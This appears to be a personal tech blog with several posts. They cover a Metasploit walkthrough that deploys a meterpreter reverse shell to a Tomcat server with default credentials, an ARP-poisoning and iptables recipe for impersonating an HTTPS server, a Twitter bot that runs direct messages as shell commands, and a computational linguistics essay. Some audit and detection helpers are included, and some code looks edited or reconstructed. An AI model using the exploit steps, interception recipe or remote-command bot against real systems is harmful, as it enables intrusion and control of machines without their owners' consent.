Javier's Blog

Mostly computers and other tech stuff,...

Wednesday, July 18, 2012

My blog has moved...

My blog has moved to:

Tuesday, January 17, 2012

Tomcat Exploitation with Metasploit

So if you have something like this in your tomcat/conf/tomcat-users.xml:

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="manager"/>
</tomcat-users>

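You can use msf (the Metasploit console) to pwn it; replace victim with the Tomcat server's address and attacker with your own:
use exploit/multi/http/tomcat_mgr_deploy
set RHOST victim
set RPORT 8080
set USERNAME tomcat
set PASSWORD tomcat
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST attacker
show options
set TARGET 1
exploit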

This works on apache-tomcat-5.5.35 (confirmed) and 6.x, and probably on 7.x too. Moral of the story: don't use tomcat-users.xml to authenticate users; you are saving passwords in plain text, and you are probably using an easily guessable password...
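Following that moral, here is a minimal Python sketch for auditing a tomcat-users.xml file for the kind of weak credentials exploited above. It assumes the format shown in this post (user elements with username and password attributes). WEAK_PASSWORDS is a hypothetical placeholder for a real wordlist, and the namespace stripping is there because some newer Tomcat releases declare an XML namespace in this file.

```python
import sys
import xml.etree.ElementTree as ET

# Hypothetical list of easily guessed passwords; replace with a real wordlist.
WEAK_PASSWORDS = {"", "tomcat", "admin", "manager", "password", "s3cret", "changeme"}

def local_name(tag):
    """Strip an XML namespace, e.g. '{http://tomcat.apache.org/xml}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]

def weak_tomcat_users(xml_text):
    """Return usernames whose plain-text password is in WEAK_PASSWORDS
    or is identical to the username."""
    root = ET.fromstring(xml_text)
    weak = []
    for element in root.iter():
        if local_name(element.tag) != "user":
            continue
        name = element.get("username", "")
        password = element.get("password", "")
        if password == name or password.lower() in WEAK_PASSWORDS:
            weak.append(name)
    return weak

if __name__ == "__main__":
    # Usage: python audit.py tomcat/conf/tomcat-users.xml
    with open(sys.argv[1], encoding="utf-8") as f:
        for user in weak_tomcat_users(f.read()):
            print("weak password for user:", user)
```

Run against the file shown at the top of this post, it reports the tomcat user.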

Friday, October 28, 2011

Web frameworks and internet security

I didn't know until recently that my thesis could be found so easily; here is a direct link to the SDSU library: http://libpac.sdsu.edu/record=b3732273~S0

Sunday, September 25, 2011

Man-in-the-Middle Server Impersonation

The Challenge
Over the years I’ve seen many presentations on Man-in-the-Middle (MitM) attacks via ARP poisoning and have found a number of tools that can do this, but I’ve never seen anyone present this technique targeting a specific server-client connection with the aim of testing the client side. Recently I was given the task of auditing a piece of software that makes a secure connection (HTTPS) to a server and transfers data back and forth. This brings up a number of challenges. First and foremost is traffic redirection, i.e., getting in the middle. Getting in the middle is trivial if the attack machine resides on the same network as the victim machine, since any of these tools can perform ARP poisoning: Cain, Ettercap, Dsniff, etc. The second challenge is to impersonate a specific server, i.e., respond only to traffic destined for the server that is to be impersonated. Last but not least is breaking or bypassing SSL encryption.
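ARP poisoning works by getting the victim to cache the attacker's MAC address for someone else's IP address (typically the gateway or the server being impersonated). The minimal Python sketch below, which assumes a Linux machine and the /proc/net/arp table format, looks for one visible side effect: a single MAC address answering for more than one IP. Treat it as a heuristic only, since a MAC shared by several IPs can be legitimate, and the attacker's own IP only appears if the victim has talked to it.

```python
from collections import defaultdict

def shared_macs(proc_net_arp_text):
    """Return {mac: [ips]} for MAC addresses that more than one IP resolves to.
    Input is the text of /proc/net/arp (Linux)."""
    ips_by_mac = defaultdict(list)
    for line in proc_net_arp_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        ip, mac = fields[0], fields[3].lower()
        if mac == "00:00:00:00:00:00":  # incomplete entry, not resolved yet
            continue
        ips_by_mac[mac].append(ip)
    return {mac: ips for mac, ips in ips_by_mac.items() if len(ips) > 1}

if __name__ == "__main__":
    with open("/proc/net/arp") as f:
        for mac, ips in shared_macs(f.read()).items():
            print(mac, "is claimed by", ", ".join(ips))
```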

I initially began testing by using Cain to perform ARP poisoning. Cain is a feature-rich penetration testing application, which I used to perform the MitM attack. So, being able to redirect traffic, I figured the task of bypassing SSL could also be done with Cain, right? Not so fast. Cain does have the ability to proxy SSL connections: it generates a certificate for any SSL connection it sees and replies to the client with that certificate, while at the same time connecting to the server side and relaying the connection. This worked great when I was testing SSL connections from a Web browser to a number of sites, but Cain failed when attempting to proxy connections for the server I was interested in impersonating. I am not sure exactly why Cain failed (“Couldn’t accept SSL connection from the client”); it may have had to do with SSL cipher strength, or somehow the client knew that the certificate Cain generated was invalid. Whatever the case, Google was not much help. Even if this had worked, I wanted to reply to a specific outbound connection, but Cain only allowed me to eavesdrop (snoop) on traffic, not to impersonate a server.

The second challenge of replying to a specific connection (server impersonation) seemed a bit tough at first, since I had never heard of a tool to do this, or so I thought. I was a bit puzzled until I figured out that all I needed to do was rewrite the destination of the packets headed for the target server so that they were delivered to my attack machine, and then reply to the connection as if the request had been made directly to my attack machine. Now what tool can I use to rewrite packets? Iptables? Of course: using Iptables I was able to reply only to traffic going to a specific server from a specific client.

First we need to be able to forward packets:
echo 1 > /proc/sys/net/ipv4/ip_forward

Then we need to redirect the victim's packets for the server to the attack machine (victim and server stand for their IP addresses):
iptables -t nat -A PREROUTING -i eth0 -p tcp -s victim -d server --dport 443 -j REDIRECT --to-port 443
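This rule only touches TCP packets from the victim to the server on port 443; everything else is forwarded untouched thanks to ip_forward. The toy Python model below is not how netfilter is implemented, just the matching logic, to make that selectivity explicit. REDIRECT rewrites the destination to an address of the attack machine itself; in the real kernel, connection tracking also reverses the rewrite on the replies, so the client keeps seeing the server's IP as the source. The -i eth0 match is left out, and the addresses in the usage note are hypothetical.

```python
from typing import NamedTuple

class Packet(NamedTuple):
    src: str
    dst: str
    dport: int

def prerouting_redirect(pkt, victim, server, local_ip, dport=443, to_port=443):
    """Toy model of:
        iptables -t nat -A PREROUTING -p tcp -s victim -d server --dport 443 \
                 -j REDIRECT --to-port 443
    A packet matching source, destination and port is rewritten to this machine;
    anything else is returned unchanged, to be forwarded as usual."""
    if pkt.src == victim and pkt.dst == server and pkt.dport == dport:
        return pkt._replace(dst=local_ip, dport=to_port), "deliver locally"
    return pkt, "forward"
```

For example, prerouting_redirect(Packet("10.0.0.5", "203.0.113.10", 443), "10.0.0.5", "203.0.113.10", "10.0.0.66") returns the packet with its destination changed to 10.0.0.66 and the action "deliver locally", while the same victim talking to any other host, or to the server on another port, gets "forward".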

So at this point I am redirecting all traffic from the victim through my attack machine and impersonating the target server. I used Ettercap (I switched from Cain since Cain only runs on Windows) to redirect traffic through the attack machine via ARP poisoning, and Iptables to change the destination IP address of packets headed for the target server. At this point, I set up Apache to accept the SSL connection and serve data to the client. I wrote a quick and dirty PHP script to fuzz the client, but Apache kept giving me out-of-memory errors when my responses got too big. So I then wrote a couple of one-line fuzzers that did not use Apache:

Fill up memory with AAA...:
ruby -e 'while true; print "A"; end' | nc -l -p 80

Fill up memory with random data:
ruby -e 'while true; print rand(127).chr; end' | nc -l -p 80
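For anyone without Ruby and netcat at hand, here is a rough Python equivalent of the two one-liners: endless generators of A's and of random bytes in the 0..126 range, plus a single-connection listener standing in for nc -l -p 80. It is a sketch assuming Python 3.8+ (for socket.create_server); unlike nc, it ignores whatever the client sends. Streaming fixed-size chunks keeps memory use on the attack machine flat while the client keeps buffering.

```python
import random
import socket

def a_stream(chunk_size=4096):
    """Endless chunks of b"A", like: ruby -e 'while true; print "A"; end'"""
    chunk = b"A" * chunk_size
    while True:
        yield chunk

def random_stream(chunk_size=4096, seed=None):
    """Endless chunks of random bytes 0..126, like rand(127).chr in the Ruby version."""
    rng = random.Random(seed)
    while True:
        yield bytes(rng.randrange(127) for _ in range(chunk_size))

def serve_once(chunks, port=80):
    """Accept one TCP connection and write chunks until the client goes away."""
    with socket.create_server(("", port)) as srv:
        conn, _ = srv.accept()
        with conn:
            try:
                for chunk in chunks:
                    conn.sendall(chunk)
            except OSError:
                pass  # connection dropped: check whether the client crashed

if __name__ == "__main__":
    serve_once(random_stream())
```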

Now the only challenge was to feed this data through an SSL channel. While searching for other SSL proxies, since Cain proved to be the wrong tool, I ran into a little tool called Stunnel, the universal SSL tunnel. By simply setting three options in its configuration file (client=no, accept=443, connect=80) I was able to set up a listener on port 443 that redirects traffic to port 80.
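For the one-way fuzzing case, Python's ssl module can also play Stunnel's role directly. This sketch accepts a single TLS connection and streams chunks to it, roughly what Stunnel in front of the nc listener does, except that nothing the client sends is relayed anywhere. The certificate and key file names are hypothetical; any self-signed pair should do against a client that does not verify certificates. Wrapping the listening socket and then calling accept() follows the pattern in the ssl module documentation; Python 3.8+ is assumed.

```python
import itertools
import socket
import ssl

def stream_to(conn, chunks, max_bytes=None):
    """Write chunks to conn until the peer disconnects or max_bytes are sent.
    Returns the number of bytes written."""
    sent = 0
    try:
        for chunk in chunks:
            if max_bytes is not None:
                chunk = chunk[: max_bytes - sent]
                if not chunk:
                    break
            conn.sendall(chunk)
            sent += len(chunk)
    except OSError:
        pass  # client went away; ssl.SSLError is a subclass of OSError
    return sent

def serve_tls(chunks, certfile, keyfile, port=443):
    """Accept one TLS connection on port and stream chunks to it."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile, keyfile)
    with socket.create_server(("", port)) as srv:
        with ctx.wrap_socket(srv, server_side=True) as tls_srv:
            conn, _ = tls_srv.accept()  # the TLS handshake happens here
            with conn:
                return stream_to(conn, chunks)

if __name__ == "__main__":
    # Hypothetical file names for a self-signed certificate and its key.
    serve_tls(itertools.repeat(b"A" * 4096), "server.crt", "server.key")
```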

Not too bad, eh… This does assume that:

  • The attack machine is on the same network as the victim machine
  • The client does not perform SSL certificate verification
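The second condition is worth seeing from the client's side. Using Python's ssl module as an example (the audited software was not necessarily written in Python), a default context verifies the certificate chain and the hostname, so it would refuse the self-signed certificate presented by Stunnel or Apache; the attack only works when the client does the equivalent of lax_context(). The function names here are illustrative.

```python
import socket
import ssl

def strict_context():
    """Client context that verifies the certificate chain against the system
    CA store and checks that the certificate matches the hostname."""
    return ssl.create_default_context()

def lax_context():
    """What a client vulnerable to this attack effectively does: accept anything."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False  # must be disabled before CERT_NONE is allowed
    ctx.verify_mode = ssl.CERT_NONE
    return ctx

def peer_certificate(host, port=443, context=None, timeout=10):
    """Connect over TLS and return the peer certificate as a dict."""
    context = context or strict_context()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with context.wrap_socket(raw, server_hostname=host) as tls:
            return tls.getpeercert()
```

Pointed at the impersonating machine, peer_certificate(host, context=strict_context()) should fail with ssl.SSLCertVerificationError (Python 3.7+), while lax_context() connects and returns an empty dict, since an unverified certificate is not decoded.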

Tuesday, July 05, 2011

I always forget basename

I always forget the name of this handy tool:

Basename returns the base name of a file, e.g.,
basename /path/to/some/file.txt
prints file.txt. But it does more than that: it can also strip the extension (or any other suffix), e.g.,
basename /path/to/some/file.txt .txt
prints file.
This may seem pretty useless, but it is very handy when you are deep in some script doing something like:

for WAR in *.war; do
  DIR=$(basename "$WAR" .war)
  mkdir -p "$DIR"
  cd "$DIR"
  jar -xvf "../$WAR"
  cd ..
done
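The same idea in Python, as a sketch: pathlib's Path.name gives the base name, and the suffix handling below mimics basename's rule of not stripping a suffix that is the whole name. WAR files are ZIP archives, so zipfile can unpack them without jar. explode_wars is a hypothetical helper name mirroring the shell loop.

```python
import zipfile
from pathlib import Path

def basename(path, suffix=""):
    """Mimic `basename PATH [SUFFIX]`: last path component, minus SUFFIX
    if it ends with SUFFIX and is not identical to it."""
    name = Path(path).name
    if suffix and name.endswith(suffix) and name != suffix:
        name = name[: -len(suffix)]
    return name

def explode_wars(directory="."):
    """Unpack every *.war in directory into a sibling folder named after it."""
    for war in sorted(Path(directory).glob("*.war")):
        target = war.parent / basename(war.name, ".war")
        target.mkdir(exist_ok=True)
        with zipfile.ZipFile(war) as archive:  # a WAR is a ZIP archive
            archive.extractall(target)
```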

I just thought I'd make this entry because I always seem to forget what the name of this simple tool is...

Friday, February 25, 2011

Just a Quick Paper on Computational Linguistics


Communication with computer systems is becoming increasingly natural. Although the technology depicted in current science fiction novels and films might seem far-fetched, computer interaction via speech is becoming a reality. Many specialized systems have been developed for people with disabilities, allowing them to interact with a computer via speech and other means. There are countless speech-to-text and text-to-speech applications that can be deployed on ordinary computers. Even most modern cellular phones have some type of speech-enabled command capability. It is true that this technology is in its infancy and has a long way to go before we can seamlessly communicate with computer systems via speech. But recent advances in the field behind it, known as Computational Linguistics, seem to grasp at what someday will no longer be science fiction.

Computational Linguistics, a subdivision of the broader subject known as Natural Language Processing (NLP), deals with language-based human-computer interaction, as well as computer-aided language translation. Computational Linguistics is used in many applications: speech recognition, language translation, spelling and grammar checking, etc. The primary techniques now used in Computational Linguistics are statistical in nature and have brought significant advances to the field in recent years [1]. A system that is to communicate seamlessly via a natural language must have the following abilities: speech recognition, natural language understanding, natural language generation and speech synthesis [3], all of which fall under Computational Linguistics. Such a system must also be capable of information retrieval and extraction as well as inference; these, however, fall somewhat outside the realm of Computational Linguistics. Given the complexity of natural languages, the task that computational linguists have taken up is more difficult than once thought.


There is some debate about the approach that computational linguists have taken. Rationalist linguists, led by Noam Chomsky, believe that statistical analysis has little to no chance of encompassing language entirely. Part of the bias against statistical analysis comes from the fact that early statistical NLP systems were extremely simple and could not begin to process the complexity of language. Another argument against statistical analysis is that computing the probability of sentences from a body of text would assign the same probability (zero) to grammatical and ungrammatical sentences that never occur in that text [2]. Furthermore, there are sentences which are grammatically correct but nonsensical. Chomsky’s famous example is “Colorless green ideas sleep furiously,” a sentence which is grammatically correct but does not make sense. The argument here is that a system which is to communicate with humans must be able to recognize such a sentence as erroneous.

Computational linguists handle this issue by not worrying about which sentences are grammatically correct and which are not; instead, they make note of sentences which are likely to be said. Correct sentences are more likely to be said, while incorrect sentences are less likely to be said. Frequently used sentences, regardless of whether they are considered correct or not, are considered part of the language, as they convey some mutually agreed meaning. The earlier objection that statistical systems are too simple no longer holds, since modern Computational Linguistic systems are nearly as complex as the models developed by rationalist linguists. The difference is that the former take a statistical approach to learning and do not try to represent every part of the brain as we understand it.


The main challenge computational linguists have taken up is the disambiguation of language. In the current state of affairs, computer systems learn from bodies of text, known as corpora [2], as they cannot observe the natural world around us and infer information as we do. The problem with this approach is that sentences can often be parsed in more than one way. A sentence may, for example, be parsed so that its verb group contains one word under one reading and several words under another. In such situations multiple parse trees may be generated, each with a slightly different meaning. For long sentences, the number of applicable parse trees may be enormous [2].
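To get a feel for how fast the number of parse trees grows, consider the purely structural case: if any binary bracketing of the words were allowed, a sentence of n words would have Catalan(n - 1) possible trees. Real grammars rule most of these out, so this is an illustrative upper bound under that assumption, not a figure taken from [2]. The Python sketch computes it both from the closed form and by recursively splitting the words into two subtrees.

```python
from functools import lru_cache
from math import comb

def binary_bracketings(n_words):
    """Number of binary-branching trees over n_words leaves: Catalan(n_words - 1)."""
    if n_words < 1:
        raise ValueError("need at least one word")
    k = n_words - 1
    return comb(2 * k, k) // (k + 1)

@lru_cache(maxsize=None)
def count_trees(n_words):
    """Same count, by trying every split point into a left and right subtree."""
    if n_words == 1:
        return 1
    return sum(count_trees(i) * count_trees(n_words - i) for i in range(1, n_words))
```

Under this assumption a 10-word sentence already has 4862 bracketings, and a 20-word sentence has 1767263190.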

Computational linguists argue that by using a statistical NLP approach, in which lexical and structural preferences in language are computed, the issue of numerous permutations of parse trees becomes moot. This approach aims to approximate the parse tree that best conveys the meaning of the sentence. Lexical and structural preferences are learned, or remembered, by Computational Linguistic systems via n-grams.


N-grams are sequences of words as they would appear in a natural language, i.e., sentence fragments, where n is the number of words in the fragment. For example, given the sentence “the fox jumped over the dog,” its trigrams (3-grams) are “the fox jumped”, “fox jumped over”, “jumped over the” and “over the dog.” These n-grams are built by parsing corpora and are partitioned by the (n - 1) preceding words they have in common. A state machine (automaton) can be built from these partitions to estimate the probability of one word, or state, following another. Using the statistical properties of n-grams, the next (n-th) word in a sentence fragment may be predicted with reasonable accuracy. A variation of this model, in which the state sequence is not directly observed, is referred to as the Hidden Markov Model (HMM). HMMs are the foundation of modern speech recognition systems [2] as well as other NLP applications.
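The trigram example can be made concrete with a small Python sketch: it partitions n-grams by their (n - 1)-word history and estimates the probability of the next word by maximum likelihood (the count of the n-gram divided by the count of its history). The three-sentence corpus is made up for illustration, and there is no smoothing, so an unseen history simply yields no prediction.

```python
from collections import Counter, defaultdict

def ngrams(tokens, n):
    """All runs of n consecutive tokens, in order."""
    return [tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]

def train(sentences, n=3):
    """Map each (n-1)-word history to a Counter of the words that followed it."""
    model = defaultdict(Counter)
    for sentence in sentences:
        for gram in ngrams(sentence.split(), n):
            model[gram[:-1]][gram[-1]] += 1
    return model

def next_word_probs(model, history):
    """Maximum-likelihood P(word | history); empty dict for unseen histories."""
    counts = model.get(tuple(history), Counter())
    total = sum(counts.values())
    return {w: c / total for w, c in counts.items()} if total else {}

def predict(model, history):
    probs = next_word_probs(model, history)
    return max(probs, key=probs.get) if probs else None

if __name__ == "__main__":
    corpus = ["the fox jumped over the dog",
              "the fox jumped over the fence",
              "the cat jumped over the dog"]
    model = train(corpus)
    print(next_word_probs(model, ["over", "the"]))
```

With that corpus, the history “over the” gives “dog” a probability of 2/3 and “fence” 1/3, so predict returns “dog”.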


Augmented Transition Networks (ATNs) build on the idea of using finite state machines to parse sentences grammatically. W. A. Woods, in “Transition Network Grammars for Natural Language Analysis” [4], claims that by adding a recursive mechanism to a finite state model, parsing can be achieved much more efficiently. Instead of building an automaton for a particular sentence, a collection of transition graphs is built. Transitions between these graphs are simply subroutine calls from a state in one graph to the initial state of any graph in the network. A sentence is determined to be grammatically correct if a final state of the sentence-level graph is reached exactly when the last word of the sentence has been consumed.
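The recursive part of the model can be sketched in Python as a recursive transition network: each network is a small state graph, and an arc labeled with another network's name acts as a subroutine call. This is only the recursive core of an ATN; the registers and arc conditions and actions that make it “augmented” are left out, and the toy grammar and lexicon are hypothetical. It would also loop forever on a left-recursive grammar.

```python
# Hypothetical toy lexicon: word -> set of word categories.
LEXICON = {"the": {"Det"}, "a": {"Det"}, "fox": {"N"}, "dog": {"N"},
           "jumped": {"V"}, "saw": {"V"}, "over": {"P"}}

# Each network: start state, final states, and arcs state -> [(label, next_state)].
# A label naming another network is a subroutine call; otherwise it is a category.
NETWORKS = {
    "S":  {"start": 0, "final": {2}, "arcs": {0: [("NP", 1)], 1: [("VP", 2)]}},
    "NP": {"start": 0, "final": {2}, "arcs": {0: [("Det", 1)], 1: [("N", 2)]}},
    "VP": {"start": 0, "final": {1, 2, 3},
           "arcs": {0: [("V", 1)], 1: [("NP", 2), ("PP", 3)]}},
    "PP": {"start": 0, "final": {2}, "arcs": {0: [("P", 1)], 1: [("NP", 2)]}},
}

def traverse(net_name, words, pos):
    """Yield every input position where network net_name can finish,
    starting at position pos."""
    net = NETWORKS[net_name]

    def walk(state, i):
        if state in net["final"]:
            yield i
        for label, nxt in net["arcs"].get(state, []):
            if label in NETWORKS:  # push: call the sub-network like a subroutine
                for j in traverse(label, words, i):
                    yield from walk(nxt, j)
            elif i < len(words) and label in LEXICON.get(words[i], set()):
                yield from walk(nxt, i + 1)  # consume one word

    yield from walk(net["start"], pos)

def accepts(sentence):
    """Grammatical if the S network reaches a final state after the last word."""
    words = sentence.lower().split()
    return any(end == len(words) for end in traverse("S", words, 0))
```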

This model meets many of the goals set forth by the nature of language in that it captures the regularities of the language. That is, if there is a process that operates in a number of environments, the grammar should encapsulate the process in a single structure [4]. Such encapsulation not only simplifies the grammar, but has the added bonus of efficiency of operation. Another advantage of such a model is the ability to postpone decisions. Many parsers resort to guessing when an ambiguity comes up, that is, when not enough is yet known about the sentence. Through the use of recursion, ATNs avoid this inefficiency by postponing decisions until more is known about the sentence [4].


As this brief overview shows, Computational Linguistics is a complex and evolving field. Although it is in its infancy, much of the groundwork has already been laid. It is hard to determine whether a system with abilities similar to those of C-3PO (Star Wars) will ever become a reality, but it is clear that a subset of those abilities is already helping us in our everyday lives. Applications such as speech recognition and text translation are by no means perfect, but they are merely a subset of the capabilities future systems will have at their disposal.


[1] Steven Abney. 1996. Statistical Methods and Linguistics. In Judith Klavans and Philip Resnik (eds.), The Balancing Act: Combining Symbolic and Statistical Approaches to Language. The MIT Press, Cambridge, MA.

[2] Christopher D. Manning and Hinrich Schütze. 1999. Foundations of Statistical Natural Language Processing. The MIT Press, Cambridge, MA.

[3] Daniel Jurafsky and James H. Martin. 2000. Speech and Language Processing. Prentice Hall, Upper Saddle River, NJ.

[4] W. A. Woods. 1970. Transition Network Grammars for Natural Language Analysis. Communications of the ACM, 13(10):591-606. ISSN 0001-0782.

Sunday, December 05, 2010

We Won Capture the Flag


I got a bit bored during the SANS GIAC class, so I decided to whip up a Twitter bot. Nothing fancy, just a quick & dirty way to command a machine through Twitter.

First, register a new account that will house the application, then register a new application at http://dev.twitter.com/apps. Once that is done, make note of your API (consumer) key, consumer secret, access token and access token secret.

Second, get the required Python packages: python-twitter & python-oauth2

hg clone http://python-twitter.googlecode.com/hg/ python-twitter
cd python-twitter/
python setup.py build
sudo python setup.py install 
git clone https://github.com/simplegeo/python-oauth2.git
cd python-oauth2/
python setup.py build
sudo python setup.py install

Third, save the code below as twitbot.py, fill in the keys noted in the first step, and run it (python twitbot.py):


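import twitter, time, os

class TwitServ:
  api = None

  def login(self):
    # Fill in the keys noted when registering the application
    self.api = twitter.Api(consumer_key='***',
                           consumer_secret='***',
                           access_token_key='***',
                           access_token_secret='***')

  def printFriends(self):
    friends = self.api.GetFriends()
    allfriends = ''
    for f in friends:
      allfriends += f.name + ' '
    print("All my friends are " + allfriends)
    #self.api.PostUpdates("I am Bot, hear me roar...")

  def getLastProcessedMsgId(self):
    # Returns '' on the first run, before the 'lastmsgid' file exists
    try:
      with open('lastmsgid', 'r') as f:
        return f.readline().strip()
    except IOError:
      return ''

  def saveLastMsgId(self, id):
    with open('lastmsgid', 'w') as f:
      f.write(str(id))

  def getLastMsg(self):
    dirmsgs = self.api.GetDirectMessages()  # newest message first
    if not dirmsgs:
      return None
    print("Last message: " + dirmsgs[0].text)
    return dirmsgs[0]

  def reply(self):
    lastmsg = self.getLastMsg()
    if lastmsg is not None and str(lastmsg.id) != self.getLastProcessedMsgId():
      self.saveLastMsgId(lastmsg.id)
      # Reconstructed: run the DM text as a shell command and send back its output.
      # Anyone able to DM the bot account can run commands this way.
      result = os.popen(lastmsg.text).readlines()
      for msg in result:
        try:
          self.api.PostDirectMessage(lastmsg.sender_id, msg[:140])
          #self.api.PostUpdates(msg[:140]) # Use this if you want replies to be public
          print("Sending message to " + str(lastmsg.sender_id) + ": " + msg[:140])
        except twitter.TwitterError:
          print("Error sending message, possible duplicate message")
    else:
      print("No new messages to process...")

  def serve(self):
    self.login()
    print("logged in...")
    while True:
      self.reply()
      time.sleep(60)  # poll interval is an arbitrary choice

if __name__ == "__main__":
  TwitServ().serve()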

To command the bot, simply send it a direct message, e.g.:
d IamBot uname -a
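The bot truncates each line of output at 140 characters, which silently drops the rest of long lines. A small sketch of an alternative (split_for_twitter is a hypothetical helper, not part of python-twitter) splits the output into pieces of at most 140 characters instead, so each piece could be passed to PostDirectMessage in turn; empty lines are skipped.

```python
def split_for_twitter(text, limit=140):
    """Split command output into messages of at most `limit` characters,
    one or more per non-empty output line."""
    messages = []
    for line in text.splitlines():
        line = line.rstrip()
        for start in range(0, len(line), limit):
            messages.append(line[start:start + limit])
    return messages
```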